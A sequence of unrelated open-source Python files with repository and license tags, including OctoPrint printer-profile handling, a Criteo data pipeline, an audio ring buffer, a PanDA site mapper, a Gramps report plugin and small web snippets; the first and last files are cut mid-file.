cmds.append(self.__class__.COMMAND_Advanced_variables_M205(minimumfeedrate, mintravelfeedrate,maxXYJerk,maxZJerk,maxEJerk))
if "dynamicCurrent" in profile:
dynamicCurrent = profile["dynamicCurrent"]
cmds.append(self.__class__.COMMAND_DYNAMIC_CURRENT_M911(dynamicCurrent))
if "extendInterface" in profile:
extendInterface = profile["extendInterface"]
thermocouple = profile["thermocouple"]
cmds.append(self.__class__.COMMAND_BBP1_EXTENT_INTERFACE_M916(extendInterface, thermocouple))
if "machineType" in profile:
machineType = profile["machineType"]
m_type_val={"XYZ":0, "Delta":1, "CoreXY":2}
print("machine Type:%d" % m_type_val[machineType])
cmds.append(self.__class__.COMMAND_MACHINE_TYPE_M913(m_type_val[machineType]))
if "delta_args" in profile:
diagonal_rod = profile["delta_args"]["diagonal_rod"]
print_radius = profile["delta_args"]["print_radius"]
segments_per_second = profile["delta_args"]["segments_per_second"]
z_home_pos = profile["delta_args"]["z_home_pos"]
cmds.append(self.__class__.COMMAND_DELTA_ARGS_M665(diagonal_rod, print_radius, segments_per_second, z_home_pos))
if "pids" in profile:
pids = []
pid0 = profile["pids"]["t0"]
pid1 = profile["pids"]["t1"]
pidbed = profile["pids"]["bed"]
pids.append(pid0)
pids.append(pid1)
pids.append(pidbed)
print("pidbed:%s" %(str(pids)))
t = 0
for pid in pids:
p,i,d,factor,offset,limit = pid["p"],pid["i"],pid["d"],pid["factor"],pid["offset"],pid["limit"]
cmds.append(self.__class__.COMMAND_TEMPETURE_PID_M301(t,p,i,d,factor,offset,limit))
t += 1
cmds.append(self.__class__.COMMAND_Finish_sending_M910)
#for cmd in cmds:
# print("cmd:%s" % str(cmd))
return cmds
def save(self, profile, allow_overwrite=False, make_default=False):
if "id" in profile:
identifier = profile["id"]
elif "name" in profile:
identifier = profile["name"]
else:
raise ValueError("profile must contain either id or name")
identifier = self._sanitize(identifier)
profile["id"] = identifier
profile = dict_clean(profile, self.__class__.default)
print("lkj save identifier:%s" % str(identifier))
#lkj
'''from octoprint.server import printer
if printer.isOperational():
cmds = self.__send_all_update_epprom(profile)
printer.commands(cmds)
cmd_eeprom = GcodeCommand("M500")
printer.command(cmd_eeprom)
pass
print("lkj save 2")
'''
self.sendPreferenctParameter(profile)
self.saveToEEPROM()
self.getBeforeAndAfterPrintParameter(profile)
if identifier == "_default":
default_profile = dict_merge(self._load_default(), profile)
settings().set(["printerProfiles", "defaultProfile"], default_profile, defaults=dict(printerProfiles=dict(defaultProfile=self.__class__.default)))
settings().save()
else:
self._save_to_path(self._get_profile_path(identifier), profile, allow_overwrite=allow_overwrite)
if make_default:
settings().set(["printerProfiles", "default"], identifier)
if self._current is not None and self._current["id"] == identifier:
self.select(identifier)
return self.get(identifier)
#lkj
def sendPreferenctParameter(self, inProfile):
from octoprint.server import printer
if printer.isOperational():
cmds = self.__send_all_update_epprom(inProfile)
printer.commands(cmds)
#cmd_eeprom = GcodeCommand("M500")
#printer.command(cmd_eeprom)
print("lkj sendPreferenctParameter")
''''''
return
def saveToEEPROM(self):
from octoprint.server import printer
if printer.isOperational():
cmd_eeprom = GcodeCommand("M500")
printer.command(cmd_eeprom)
def getBeforeAndAfterPrintParameter(self, inProfile):
from octoprint.server import printer
if "cmdPrintStart" in inProfile:
cmds = inProfile["cmdPrintStart"]
gcode_cmds = []
print("lkj cmdPrintStart cmds:%s" %(str(cmds)))
for cmd in cmds:
str_cmd = cmd["cmd"]
gcode_cmd = GcodeCommand.from_line(str_cmd)
print("lkj cmdPrintStart gcode_cmd:%s" %(str(gcode_cmd)))
gcode_cmds.append(gcode_cmd)
printer.setCmdBeforePrint(gcode_cmds)
if "cmdPrintStop" in inProfile:
cmds = inProfile["cmdPrintStop"]
gcode_cmds = []
print("lkj cmdPrintStop cmds:%s" %(str(cmds)))
for cmd in cmds:
str_cmd = cmd["cmd"]
gcode_cmd = GcodeCommand.from_line(str_cmd)
print("lkj cmdPrintStop gcode_cmd:%s" %(str(gcode_cmd)))
gcode_cmds.append(gcode_cmd)
printer.setCmdAfterPrint(gcode_cmds)
print("lkj getBeforeAndAfterPrintParameter")
def get_default(self):
default = settings().get(["printerProfiles", "default"])
if default is not None and self.exists(default):
profile = self.get(default)
if profile is not None:
return profile
return self._load_default()
def set_default(self, identifier):
all_identifiers = self._load_all_identifiers().keys()
if identifier is not None and not identifier in all_identifiers:
return
settings().set(["printerProfile", "default"], identifier)
settings().save()
def get_current_or_default(self):
if self._current is not None:
return self._current
else:
return self.get_default()
def get_current(self):
return self._current
def exists(self, identifier):
if identifier is None:
return False
elif identifier == "_default":
return True
else:
path = self._get_profile_path(identifier)
return os.path.exists(path) and os.path.isfile(path)
def _load_all(self):
all_identifiers = self._load_all_identifiers()
results = dict()
for identifier, path in all_identifiers.items():
if identifier == "_default":
profile = self._load_default()
else:
profile = self._load_from_path(path)
if profile is None:
continue
results[identifier] = dict_merge(self._load_default(), profile)
return results
def _load_all_identifiers(self):
results = dict(_default=None)
for entry in os.listdir(self._folder):
if entry.startswith(".") or not entry.endswith(".profile") or entry == "_default.profile":
continue
path = os.path.join(self._folder, entry)
if not os.path.isfile(path):
continue
identifier = entry[:-len(".profile")]
results[identifier] = path
return results
def _load_from_path(self, path):
if not os.path.exists(path) or not os.path.isfile(path):
return None
import yaml
with open(path) as f:
profile = yaml.safe_load(f)
return profile
def _save_to_path(self, path, profile, allow_overwrite=False):
if os.path.exists(path) and not allow_overwrite:
raise SaveError("Profile %s already exists and not allowed to overwrite" % profile["id"])
import yaml
with open(path, "wb") as f:
try:
yaml.safe_dump(profile, f, default_flow_style=False, indent=" ", allow_unicode=True)
except Exception as e:
raise SaveError("Cannot save profile %s: %s" % (profile["id"], e.message))
def _remove_from_path(self, path):
try:
os.remove(path)
return True
except:
return False
def _load_default(self):
default_profile = settings().get(["printerProfiles", "defaultProfile"])
return dict_merge(copy.deepcopy(self.__class__.default), default_profile)
def _get_profile_path(self, identifier):
return os.path.join(self._folder, "%s.profile" % identifier)
def _sanitize(self, name):
if name is None:
return None
if "/" in name or "\\" in name:
raise ValueError("name must not contain / or \\")
import string
valid_chars = "-_.() {ascii}{digits}".format(ascii=string.ascii_letters, digits=string.digits)
sanitized_name = ''.join(c for c in name if c in valid_chars)
sanitized_name = sanitized_name.replace(" ", "_")
return sanitized_name
| fastbot3d/Octoprint | src/octoprint/printer/profile.py | Python | agpl-3.0 | 22,124 |
# Lint as: python3
"""Flume preprocessing pipeline for Criteo data.
"""
import collections
import csv
import logging as stdlogging
import re
from absl import app
from absl import flags
import apache_beam as beam
import numpy as np
import tensorflow.compat.v1 as tf
import runner
FLAGS = flags.FLAGS
flags.DEFINE_string(
"input_path", "",
("Input path. Be sure to set this to cover all data, to ensure "
"that sparse vocabs are complete."))
flags.DEFINE_string(
"output_path", "",
"Output directory and prefix.")
flags.DEFINE_integer(
"batch_size", 4,
"Number of samples to group into a batch.")
flags.DEFINE_bool(
"drop_remainder", False,
("If true, drop remainder elements that cannot compose a full batch. "
"If false, pad the remainder."))
NUMERIC_FEATURE_KEYS = ["int-feature-%d" % x for x in range(1, 14)]
CATEGORICAL_FEATURE_KEYS = ["categorical-feature-%d" % x for x in range(14, 40)]
LABEL_KEY = "clicked"
FIELDS = [LABEL_KEY] + NUMERIC_FEATURE_KEYS + CATEGORICAL_FEATURE_KEYS
num_samples = 0
num_files = 0
def gen_batches(input_filename):
"""Function to be used by beam.Map()."""
print("Worker processing file {}".format(input_filename))
def _output_file_index(s):
nums = re.findall(r"\d+", s)
if len(nums) == 1:
return nums[0]
elif len(nums) > 1:
return nums[-2]+"-of-"+nums[-1]
else:
idx = abs(hash(s)) % (10 ** 8)
return str(idx)
out_filename = FLAGS.output_path + _output_file_index(input_filename)
def _float_feature(value):
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))
# def _int64_feature(value):
# return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _serialize_batch(feature_dict):
for key in feature_dict:
if key in CATEGORICAL_FEATURE_KEYS:
# feature_dict[key] = _int64_feature(feature_dict[key])
# Serialize-to-string for int32s.
array_int32 = np.array(feature_dict[key], dtype=np.int32)
feature_dict[key] = _bytes_feature(
[memoryview(array_int32).tobytes()])
else:
feature_dict[key] = _float_feature(feature_dict[key])
example_proto = tf.train.Example(
features=tf.train.Features(feature=feature_dict))
return example_proto.SerializeToString()
def _extract_batch(dict_reader, batch_size):
"""dict_reader is a csv.DictReader."""
batch_features = collections.defaultdict(list)
idx = 0
for idx, sample in enumerate(dict_reader):
for key in sample:
if key in CATEGORICAL_FEATURE_KEYS:
batch_features[key].append(int(sample[key]))
else:
batch_features[key].append(float(sample[key]))
if (idx + 1) % batch_size == 0:
yield batch_size, batch_features
batch_features.clear()
# If less than a batch remains, return the number of valid entries in batch.
yield (idx + 1) % batch_size, batch_features
def _pad_to_batch(feature_dict, samples_written):
pad_size = FLAGS.batch_size - samples_written
for key in feature_dict:
if key in CATEGORICAL_FEATURE_KEYS:
feature_dict[key].extend([0] * pad_size)
elif key in NUMERIC_FEATURE_KEYS:
feature_dict[key].extend([0.0] * pad_size)
elif key == LABEL_KEY:
feature_dict[key].extend([-1.0] * pad_size)
else:
raise ValueError("Unknown feature key while padding to batch.")
return feature_dict
num_batches = 0
with tf.io.gfile.GFile(input_filename, "r") as f:
dict_reader = csv.DictReader(f, dialect=csv.excel_tab, fieldnames=FIELDS)
with tf.io.TFRecordWriter(out_filename) as writer:
for samples_written, features_batch in _extract_batch(
dict_reader, FLAGS.batch_size):
if samples_written < FLAGS.batch_size and not FLAGS.drop_remainder:
features_batch = _pad_to_batch(features_batch, samples_written)
example_bytes = _serialize_batch(features_batch)
writer.write(example_bytes)
num_batches += 1
return num_batches
def process_files(input_path):
"""Returns a pipeline which creates batched TFRecords.
Args:
input_path: File pattern to read.
"""
def pipeline(root):
"""Pipeline instantiation function.
Args:
root: Source pipeline from which to extend.
"""
global num_files
filename_list = tf.io.gfile.glob(input_path)
num_files = len(filename_list)
assert num_files > 0, "No files provided."
print("Beginning processing on {} files.".format(num_files))
def capture_sample_cnt(line):
global num_samples
num_samples = int(line)
print("\n** Number of samples: {}".format(num_samples))
_ = (
root
| beam.io.ReadFromText(input_path)
| beam.combiners.Count.Globally()
| beam.Map(capture_sample_cnt))
def _print_output(num_batches):
num_batches = int(num_batches)
print("\n** {} batches created ({} samples).\n".format(
num_batches, num_batches * FLAGS.batch_size))
_ = (
root
| "CreateFilenameList" >> beam.Create(filename_list)
| "GenerateBatches" >> beam.Map(gen_batches)
| "AccumulateNumBatches" >> beam.CombineGlobally(sum)
| "PrintReport" >> beam.Map(_print_output))
return pipeline
def main(argv):
del argv
stdlogging.getLogger().setLevel(stdlogging.INFO)
runner.program_started() # Must be called before creating the pipeline.
pipeline = process_files(FLAGS.input_path)
runner.FlumeRunner().run(pipeline).wait_until_finish()
if __name__ == "__main__":
app.run(main)
| mlperf/training_results_v0.7 | Google/benchmarks/dlrm/implementations/dlrm-research-TF-tpu-v4-512/criteo_util/criteo_batched.py | Python | apache-2.0 | 5,711 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2009 Timothée Lecomte
# This file is part of Friture.
#
# Friture is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as published by
# the Free Software Foundation.
#
# Friture is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Friture. If not, see <http://www.gnu.org/licenses/>.
# FIXME problem when self.offset overflows the MAXINT limit !
from numpy import zeros
class RingBuffer():
def __init__(self, logger):
# buffer length is dynamic based on the needs
self.buffer_length = 10000
self.buffer = zeros((1, 2 * self.buffer_length))
self.offset = 0
self.logger = logger
def push(self, floatdata):
# update the circular buffer
dim = floatdata.shape[0]
l = floatdata.shape[1]
if dim != self.buffer.shape[0]:
# switched from single to dual channels or vice versa
self.buffer = zeros((dim, 2 * self.buffer_length))
self.grow_if_needed(l)
# first copy, always complete
offset = self.offset % self.buffer_length
self.buffer[:, offset: offset + l] = floatdata[:, :]
# second copy, can be folded
direct = min(l, self.buffer_length - offset)
folded = l - direct
self.buffer[:, offset + self.buffer_length: offset + self.buffer_length + direct] = floatdata[:, 0: direct]
self.buffer[:, :folded] = floatdata[:, direct:]
self.offset += l
def data(self, length):
self.grow_if_needed(length)
stop = self.offset % self.buffer_length + self.buffer_length
start = stop - length
while stop > 2 * self.buffer_length:
self.grow_if_needed(stop)
stop = self.offset % self.buffer_length + self.buffer_length
start = stop - length
if start > 2 * self.buffer_length or start < 0:
raise ArithmeticError("Start index is wrong %d %d" % (start, self.buffer_length))
if stop > 2 * self.buffer_length:
raise ArithmeticError("Stop index is larger than buffer size: %d > %d" % (stop, 2 * self.buffer_length))
return self.buffer[:, start: stop]
def data_older(self, length, delay_samples):
self.grow_if_needed(length + delay_samples)
start = (self.offset - length - delay_samples) % self.buffer_length + self.buffer_length
stop = start + length
return self.buffer[:, start: stop]
def data_indexed(self, start, length):
delay = self.offset - start
self.grow_if_needed(length + delay)
stop0 = start % self.buffer_length + self.buffer_length
start0 = stop0 - length
if start0 > 2 * self.buffer_length or start0 < 0:
raise ArithmeticError("Start index is wrong %d %d" % (start0, self.buffer_length))
if stop0 > 2 * self.buffer_length:
raise ArithmeticError("Stop index is larger than buffer size: %d > %d" % (stop0, 2 * self.buffer_length))
return self.buffer[:, start0: stop0]
def grow_if_needed(self, length):
if length > self.buffer_length:
# let the buffer grow according to our needs
old_length = self.buffer_length
new_length = int(1.5 * length)
message = "Ringbuffer: growing buffer for length %d" % (new_length)
if self.logger is not None:
self.logger.push(message)
else:
print(message)
# create new buffer
newbuffer = zeros((self.buffer.shape[0], 2 * new_length))
# copy existing data so that self.offset does not have to be changed
old_offset_mod = self.offset % old_length
new_offset_mod = self.offset % new_length
shift = new_offset_mod - old_offset_mod
# first copy, always complete
newbuffer[:, shift:shift + old_length] = self.buffer[:, :old_length]
# second copy, can be folded
direct = min(old_length, new_length - shift)
folded = old_length - direct
newbuffer[:, new_length + shift:new_length + shift + direct] = self.buffer[:, :direct]
newbuffer[:, :folded] = self.buffer[:, direct:direct + folded]
# assign self.butter to the new larger buffer
self.buffer = newbuffer
self.buffer_length = new_length
| UIKit0/friture | friture/ringbuffer.py | Python | gpl-3.0 | 4,737 |
import re
import sys
import traceback
from config import panda_config
# logger
from pandalogger.PandaLogger import PandaLogger
_logger = PandaLogger().getLogger('SiteMapper')
# PandaIDs
from PandaSiteIDs import PandaSiteIDs
# default site
from taskbuffer.SiteSpec import SiteSpec
from taskbuffer.NucleusSpec import NucleusSpec
defSite = SiteSpec()
defSite.sitename = panda_config.def_sitename
defSite.nickname = panda_config.def_nickname
defSite.dq2url = panda_config.def_dq2url
defSite.ddm = panda_config.def_ddm
defSite.type = panda_config.def_type
defSite.gatekeeper = panda_config.def_gatekeeper
defSite.status = panda_config.def_status
defSite.setokens = {}
worldCloudName = 'WORLD'
nucleusTag = 'nucleus:'
########################################################################
class SiteMapper:
# constructor
def __init__(self,taskBuffer,verbose=False):
_logger.debug('__init__ SiteMapper')
try:
# site list
self.siteSpecList = {}
# sites not belonging to a cloud
self.defCloudSites = []
# cloud specification
self.cloudSpec = {}
# spec for WORLD cloud
self.worldCloudSpec = {}
# nuclei
self.nuclei = {}
# satellites
self.satellites = {}
# create CloudSpec list
tmpCloudListDB = taskBuffer.getCloudList()
for tmpName,tmpCloudSpec in tmpCloudListDB.iteritems():
cloudSpec = {}
# copy attributes from CloudSepc
for tmpAttr in tmpCloudSpec._attributes:
cloudSpec[tmpAttr] = getattr(tmpCloudSpec,tmpAttr)
# append additional attributes
# source : Panda siteID for source
# dest : Panda siteID for dest
# sites : Panda siteIDs in the cloud
cloudSpec['source'] = cloudSpec['tier1']
cloudSpec['dest'] = cloudSpec['tier1']
cloudSpec['sites'] = []
if tmpName == worldCloudName:
self.worldCloudSpec = cloudSpec
else:
self.cloudSpec[tmpName] = cloudSpec
_logger.debug('Cloud->%s %s' % (tmpName,str(self.cloudSpec[tmpName])))
# add WORLD cloud
self.worldCloudSpec['sites'] = []
# get list of PandaIDs
siteIDsList = taskBuffer.getSiteList()
firstDefault = True
# read full list from DB
siteFullList = taskBuffer.getSiteInfo()
# read DB to produce paramters in siteinfo dynamically
for tmpID,tmpNicknameList in siteIDsList.iteritems():
for tmpNickname in tmpNicknameList:
# invalid nickname
if not siteFullList.has_key(tmpNickname):
continue
# get full spec
ret = siteFullList[tmpNickname]
# append
if ret == None:
_logger.error('Could not read site info for %s:%s' % (tmpID,tmpNickname))
elif (firstDefault and tmpID == defSite.sitename) or (not self.siteSpecList.has_key(tmpID)) \
or (self.siteSpecList.has_key(tmpID) and self.siteSpecList[tmpID].status in ['offline','']):
# overwrite default or remove existing offline
if firstDefault and tmpID == defSite.sitename:
del self.siteSpecList[tmpID]
firstDefault = False
elif self.siteSpecList.has_key(tmpID) and self.siteSpecList[tmpID].status in ['offline','']:
del self.siteSpecList[tmpID]
# append
if not self.siteSpecList.has_key(tmpID):
# determine type following a convention
tmpType = 'production'
if tmpID.startswith('ANALY_'):
tmpType = 'analysis'
elif re.search('test',tmpID,re.I) or \
(PandaSiteIDs.has_key(tmpID) and PandaSiteIDs[tmpID]['status']!='OK'):
tmpType = 'test'
# set type
ret.sitename = tmpID
ret.type = tmpType
# don't use site for production when cloud is undefined
if ret.type == 'production' and ret.cloud == '':
_logger.error('Empty cloud for %s:%s' % (tmpID,tmpNickname))
else:
self.siteSpecList[tmpID] = ret
else:
# overwrite status
if not ret.status in ['offline','']:
if self.siteSpecList[tmpID].status != 'online':
self.siteSpecList[tmpID].status = ret.status
# use larger maxinputsize and memory
try:
if ret.status in ['online']:
if self.siteSpecList[tmpID].maxinputsize < ret.maxinputsize or \
ret.maxinputsize == 0:
self.siteSpecList[tmpID].maxinputsize = ret.maxinputsize
if (self.siteSpecList[tmpID].memory != 0 and self.siteSpecList[tmpID].memory < ret.memory) or \
ret.memory == 0:
self.siteSpecList[tmpID].memory = ret.memory
except:
errtype, errvalue = sys.exc_info()[:2]
_logger.error("%s memory/inputsize failuer : %s %s" % (tmpID,errtype,errvalue))
# collect nuclei
if ret.role == 'nucleus' and ret.type == 'production':
if not ret.pandasite in self.nuclei:
nucleus = NucleusSpec(ret.pandasite)
nucleus.state = ret.pandasite_state
self.nuclei[ret.pandasite] = nucleus
self.nuclei[ret.pandasite].add(ret.sitename,ret.ddm_endpoints)
# collect satellites
if ret.role == 'satellite' and ret.type == 'production':
if not ret.pandasite in self.satellites:
satellite = NucleusSpec(ret.pandasite)
satellite.state = ret.pandasite_state
self.satellites[ret.pandasite] = satellite
self.satellites[ret.pandasite].add(ret.sitename,ret.ddm_endpoints)
# make cloudSpec
for siteSpec in self.siteSpecList.values():
# choose only prod sites
if siteSpec.type != 'production':
continue
# append prod site in cloud
for tmpCloud in siteSpec.cloudlist:
if self.cloudSpec.has_key(tmpCloud):
if not siteSpec.sitename in self.cloudSpec[tmpCloud]['sites']:
# append
self.cloudSpec[tmpCloud]['sites'].append(siteSpec.sitename)
else:
# append to the default cloud
if not siteSpec.sitename in self.defCloudSites:
# append
self.defCloudSites.append(siteSpec.sitename)
# add to WORLD cloud
if not siteSpec.sitename in self.worldCloudSpec['sites']:
self.worldCloudSpec['sites'].append(siteSpec.sitename)
# set defCloudSites for backward compatibility
if self.cloudSpec.has_key('US'):
# use US sites
self.defCloudSites = self.cloudSpec['US']['sites']
else:
# add def site as a protection if defCloudSites is empty
self.defCloudSites.append(defSite.sitename)
# dump sites
if verbose:
_logger.debug('========= dump =========')
for tmpSite,tmpSiteSpec in self.siteSpecList.iteritems():
_logger.debug('Site->%s' % str(tmpSiteSpec))
# check
for tmpCloud,tmpVals in self.cloudSpec.iteritems():
# set T1
try:
tmpVals['sites'].remove(tmpVals['dest'])
except:
pass
tmpVals['sites'].insert(0,tmpVals['dest'])
# dump
_logger.debug('Cloud:%s has %s' % (tmpCloud,tmpVals['sites']))
for tmpSite in tmpVals['sites']:
if not self.siteSpecList.has_key(tmpSite):
_logger.debug(" '%s' doesn't exist" % tmpSite)
continue
tmpSiteSpec = self.siteSpecList[tmpSite]
if tmpSiteSpec.status in ['offline']:
_logger.debug(' %s:%s' % (tmpSite,tmpSiteSpec.status))
_logger.debug('Cloud:XX has %s' % self.defCloudSites)
except:
type, value, traceBack = sys.exc_info()
_logger.error("__init__ SiteMapper : %s %s" % (type,value))
_logger.error(traceback.format_exc())
_logger.debug('__init__ SiteMapper done')
# accessor for site
def getSite(self,site):
try:
if site.startswith(nucleusTag):
tmpName = site.split(':')[-1]
if tmpName in self.nuclei:
site = self.nuclei[tmpName].getOnePandaSite()
elif tmpName in self.satellites:
site = self.satellites[tmpName].getOnePandaSite()
except:
pass
if self.siteSpecList.has_key(site):
return self.siteSpecList[site]
else:
# return default site
return defSite
# check if site exists
def checkSite(self,site):
try:
if site.startswith(nucleusTag):
tmpName = site.split(':')[-1]
if tmpName in self.nuclei:
site = self.nuclei[tmpName].getOnePandaSite()
elif tmpName in self.satellites:
site = self.satellites[tmpName].getOnePandaSite()
except:
pass
return self.siteSpecList.has_key(site)
# resolve nucleus
def resolveNucleus(self,site):
try:
if site.startswith(nucleusTag):
tmpName = site.split(':')[-1]
if tmpName in self.nuclei:
site = self.nuclei[tmpName].getOnePandaSite()
elif tmpName in self.satellites:
site = self.satellites[tmpName].getOnePandaSite()
except:
pass
if site == 'NULL':
site = None
return site
# accessor for cloud
def getCloud(self,cloud):
if self.cloudSpec.has_key(cloud):
return self.cloudSpec[cloud]
elif cloud == worldCloudName:
return self.worldCloudSpec
else:
# return sites in default cloud
ret = { 'source' : 'default',
'dest' : 'default',
'sites' : self.defCloudSites,
'transtimelo' : 2,
'transtimehi' : 1,
}
return ret
# accessor for cloud
def checkCloud(self,cloud):
if self.cloudSpec.has_key(cloud):
return True
elif cloud == worldCloudName:
return True
else:
return False
# accessor for cloud list
def getCloudList(self):
return self.cloudSpec.keys()
# get ddm point
def getDdmEndpoint(self,siteID,storageToken):
if not self.checkSite(siteID):
return None
siteSpec = self.getSite(siteID)
if siteSpec.setokens.has_key(storageToken):
return siteSpec.setokens[storageToken]
return siteSpec.ddm
# get nucleus
def getNucleus(self,tmpName):
if tmpName in self.nuclei:
return self.nuclei[tmpName]
if tmpName in self.satellites:
return self.satellites[tmpName]
return None
| RRCKI/panda-server | pandaserver/brokerage/SiteMapper.py | Python | apache-2.0 | 12,774 |
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2012 Nick Hall
# Copyright (C) 2012 Brian G. Matherly
# Copyright (C) 2012-2014 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#------------------------------------------------------------------------
#
# Python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.translation.sgettext
from gramps.gen.plug.report import Report
from gramps.gen.plug.report import MenuReportOptions
from gramps.gen.plug.report import stdoptions
from gramps.gen.plug.docgen import (FontStyle, ParagraphStyle, TableStyle,
TableCellStyle, FONT_SANS_SERIF,
IndexMark, INDEX_TYPE_TOC)
#------------------------------------------------------------------------
#
# AlphabeticalIndex
#
#------------------------------------------------------------------------
class AlphabeticalIndex(Report):
""" This report class generates an alphabetical index for a book. """
def __init__(self, database, options, user):
"""
Create AlphabeticalIndex object that produces the report.
The arguments are:
database - the Gramps database instance
options - instance of the Options class for this report
user - a gen.user.User() instance
"""
Report.__init__(self, database, options, user)
self._user = user
self.set_locale(options.menu.get_option_by_name('trans').get_value())
def write_report(self):
""" Generate the contents of the report """
mark = IndexMark(self._("Alphabetical Index"), INDEX_TYPE_TOC, 1)
self.doc.start_paragraph("IDX-Title")
self.doc.write_text('', mark)
self.doc.end_paragraph()
self.doc.index_title = self._('Index')
self.doc.insert_index()
#------------------------------------------------------------------------
#
# AlphabeticalIndexOptions
#
#------------------------------------------------------------------------
class AlphabeticalIndexOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, dbase):
self.__db = dbase
MenuReportOptions.__init__(self, name, dbase)
def get_subject(self):
""" Return a string that describes the subject of the report. """
return _('Entire Book')
def add_menu_options(self, menu):
""" Add the options for this report """
category_name = _("Report Options")
stdoptions.add_localization_option(menu, category_name)
def make_default_style(self, default_style):
"""Make the default output style for the AlphabeticalIndex report."""
font = FontStyle()
font.set(face=FONT_SANS_SERIF, size=14)
para = ParagraphStyle()
para.set_font(font)
para.set_bottom_margin(0.25)
para.set_description(_('The style used for the title.'))
default_style.add_paragraph_style("IDX-Title", para)
table = TableStyle()
table.set_width(100)
table.set_columns(2)
table.set_column_width(0, 80)
table.set_column_width(1, 20)
default_style.add_table_style("IDX-Table", table)
cell = TableCellStyle()
default_style.add_cell_style("IDX-Cell", cell)
font = FontStyle()
font.set(face=FONT_SANS_SERIF, size=10)
para = ParagraphStyle()
para.set_font(font)
para.set_description(_('The basic style used for the text display.'))
default_style.add_paragraph_style("IDX-Entry", para)
| SNoiraud/gramps | gramps/plugins/textreport/alphabeticalindex.py | Python | gpl-2.0 | 4,553 |
from jinja2 import Environment, FileSystemLoader
loader = FileSystemLoader("webx/templates")
env = Environment(loader=loader)
template = env.get_template('form.html')
print template.render(the='variables', go='here') | mabotech/maboss.py | maboss/webx/models/gen_form.py | Python | mit | 227 |
from BaseModel import BaseModel
import DatabaseLayer
class HabitBaseModel(BaseModel):
"""
This will be the base class for all of my models. And since my save
changes is going to use pretty much the same logic in all of my models,
I'm going to centralize the logic in this base glass. I know that that is
a frown upon use of inheritance but fuck it.
"""
@classmethod
def construct_model_from_pk(cls,pk):
"""
args:
id:
uses the id to load this model from the database.
return: an instance of the model on which this is called
"""
if not cls.get_dbFields().COLLECTION_NAME:
raise NotImplementedError("This needs a collection name to work")
collection = DatabaseLayer.get_table(cls.get_dbFields().COLLECTION_NAME)
obj = cls()
obj.dict = collection.find_one({cls.get_dbFields().PK_KEY:pk})
return obj
@classmethod
def construct_model_from_dict(cls,dict):
"""
args:
dict:
loads the properties of the model from the dict.
return: an instance of the model on which this is called
"""
obj = cls()
obj.dict = dict
return obj
def save_changes(self):
collection = DatabaseLayer.get_table(self.get_dbFields().COLLECTION_NAME)
if self.get_pk():
if self._changes:
collection.update_one({self.get_dbFields().PK_KEY:self.get_pk()},{'$set':self._changes})
else:
pk = collection.insert_one(self.dict).inserted_id
self.dict[self.get_dbFields().PK_KEY] = pk
self._changes = {}
| joelliusp/SpaceHabit | SpaceHabitRPG/Models/HabitBaseModel.py | Python | mit | 1,573 |
# Package versioning solution originally found here:
# http://stackoverflow.com/q/458550
# Store the version here so:
# 1) we don't load dependencies by storing it in __init__.py
# 2) we can import it in setup.py for the same reason
# 3) we can import it into your module
__version__ = '0.3.8'
| tlatzko/spmcluster | .tox/docs/lib/python2.7/site-packages/build/lib/build/lib/build/lib/build/lib/build/lib/build/lib/sphinxcontrib/napoleon/_version.py | Python | bsd-2-clause | 295 |
import sys
from aimes.emgr.utils import *
__author__ = "Matteo Turilli"
__copyright__ = "Copyright 2015, The AIMES Project"
__license__ = "MIT"
# -----------------------------------------------------------------------------
def write_skeleton_conf(cfg, scale, cores, uniformity, fout):
'''Write a skeleton configuration file with the set number/type/duration of
tasks and stages.
'''
substitutes = dict()
substitutes['SCALE'] = scale
substitutes['CORES'] = cores[-1]
if substitutes['CORES'] > 1:
substitutes['TASK_TYPE'] = 'parallel'
elif substitutes['CORES'] == 1:
substitutes['TASK_TYPE'] = 'serial'
else:
print "ERROR: invalid number of cores per task: '%s'." % cores
sys.exit(1)
if uniformity == 'uniform':
substitutes['UNIFORMITY_DURATION'] = "%s %s" % \
(uniformity, cfg['skeleton_task_duration']['max'])
# TODO: Calculate stdev and avg.
elif uniformity == 'gauss':
substitutes['UNIFORMITY_DURATION'] = "%s [%s, %s]" % \
(uniformity, cfg['skeleton_task_duration']['avg'],
cfg['skeleton_task_duration']['stdev'])
else:
print "ERROR: invalid task uniformity '%s' specified." % uniformity
sys.exit(1)
write_template(cfg['skeleton_template'], substitutes, fout)
| radical-cybertools/aimes.emgr | src/aimes/emgr/workloads/skeleton.py | Python | mit | 1,336 |
#!/usr/bin/env python
import tornado.ioloop
import tornado.web
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("Hello, world")
application = tornado.web.Application([
(r"/", MainHandler),
])
if __name__ == "__main__":
application.listen(8888)
tornado.ioloop.IOLoop.instance().start()
| tinyogre/multislash | testserver.py | Python | mit | 337 |
"""
This module contains all the views which are used
by the manager to add/edit healthprofessionals and the
views used by the healthprofessional itselves.
:subtitle:`Class definitions:`
"""
import StringIO
from datetime import date
from django.contrib.auth.decorators import login_required, user_passes_test
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from apps.utils.utils import sent_password_change_request
from apps.healthperson.healthprofessional.forms import\
HealthProfessionalAddForm, HealthProfessionalSearchForm,\
HealthProfessionalEditForm, HealthProfessionalPhotoForm,\
